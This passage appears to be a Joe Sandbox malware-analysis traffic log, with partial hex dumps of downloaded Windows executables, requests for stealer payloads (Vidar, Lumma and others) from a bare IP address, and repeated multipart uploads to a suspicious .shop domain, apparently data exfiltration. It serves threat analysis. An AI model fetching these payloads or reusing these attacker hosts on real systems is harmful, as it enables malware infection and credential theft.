00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 07:16:15 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 28 Jun 2024 09:54:34 GMTETag: "69200-61bf03c16d934"Accept-Ranges: bytesContent-Length: 430592Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1b 91 b1 d7 5f f0 df 84 5f f0 df 84 5f f0 df 84 8c 82 dc 85 4e f0 df 84 8c 82 da 85 f4 f0 df 84 8c 82 db 85 49 f0 df 84 9d 71 db 85 4d f0 df 84 9d 71 dc 85 4a f0 df 84 8c 82 de 85 58 f0 df 84 5f f0 de 84 df f0 df 84 9d 71 da 85 09 f0 df 84 ac 72 da 85 5e f0 df 84 ac 72 df 85 5e f0 df 84 ac 72 dd 85 5e f0 df 84 52 69 63 68 5f f0 df 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 56 88 7e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 6a 02 00 00 36 04 00 00 00 00 00 67 92 00 00 00 10 00 00 00 80 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 29 03 00 50 00 00 00 40 2a 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 06 00 34 1f 00 00 58 09 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 08 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 37 58 02 00 00 10 00 00 00 5a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 42 73 53 00 00 00 00 4d 0e 00 00 00 70 02 00 00 10 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 66 b2 00 00 00 80 02 00 00 b4 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 60 03 00 00 40 03 00 00 50 03 00 00 22 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 34 1f 00 00 00 b0 06 00 00 20 00 00 00 72 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 07:16:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 30 Jun 2024 07:52:30 GMTETag: "81000-61c16c33a5f2a"Accept-Ranges: bytesContent-Length: 528384Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed bc 81 78 a9 dd ef 2b a9 dd ef 2b a9 dd ef 2b 7a af ec 2a b8 dd ef 2b 7a af ea 2a 00 dd ef 2b 7a af eb 2a bf dd ef 2b 6b 5c eb 2a bb dd ef 2b 6b 5c ec 2a bc dd ef 2b 7a af ee 2a ae dd ef 2b a9 dd ee 2b 28 dd ef 2b 6b 5c ea 2a fc dd ef 2b 5a 5f ea 2a a8 dd ef 2b 5a 5f ef 2a a8 dd ef 2b 5a 5f ed 2a a8 dd ef 2b 52 69 63 68 a9 dd ef 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b7 0e 81 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 40 02 00 00 dc 05 00 00 00 00 00 52 74 00 00 00 10 00 00 00 50 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 f5 02 00 50 00 00 00 10 f6 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 08 00 1c 1d 00 00 68 d8 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d7 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 2e 02 00 00 10 00 00 00 30 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 42 73 53 00 00 00 00 1d 0e 00 00 00 40 02 00 00 10 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 ae 00 00 00 50 02 00 00 b0 00 00 00 44 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 0c 05 00 00 00 03 00 00 fe 04 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 1c 1d 00 00 00 10 08 00 00 1e 00 00 00 f2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 07:16:19 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 30 Jun 2024 07:53:32 GMTETag: "55000-61c16c6e7cd68"Accept-Ranges: bytesContent-Length: 348160Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 dc 9a d7 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 2a 05 00 00 24 00 00 00 00 00 00 2e 49 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 05 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 48 05 00 4b 00 00 00 00 60 05 00 b0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 29 05 00 00 20 00 00 00 2a 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 20 00 00 00 60 05 00 00 22 00 00 00 2c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 05 00 00 02 00 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 49 05 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 59 02 00 60 78 02 00 03 00 00 00 30 04 00 06 3c d2 04 00 c4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 1a 28 01 00 00 06 2a 00 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 21 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 7f 03 00 04 28 bb 04 00 06 a2 25 17 1f 47 7e 7f 03 00 04 28 bb 04 00 06 a2 25 18 1f 48 7e 7f 03 00 04 28 bb 04 00 06 a2 25 19 1f 65 7e 7f 03 00 04 28 bb 04 00 06 a2 7e 80 03 00 04 28 bf 04 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 15 00 00 06 13 06 00 73 3e 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 7f 03 00 04 28 bb 04 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 7f 03 00 04 28 bb 04 00 06 13 08 00 38 43 00 00 00 00 11 05 1f 16 7e 7

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /g067n HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: PLUSTELECOM-ASRU PLUSTELECOM-ASRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18169Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8790Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20443Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7088Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1369Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 448909Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18169Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18169Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8790Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8790Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20443Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20443Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7088Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7088Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1294Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1294Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 580138Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 580138Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: potterryisiw.shop
Source: global traffic	HTTP traffic detected: HEAD /rise2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rise2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /vidar2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vidar2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /lumma2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /meta2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /meta2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
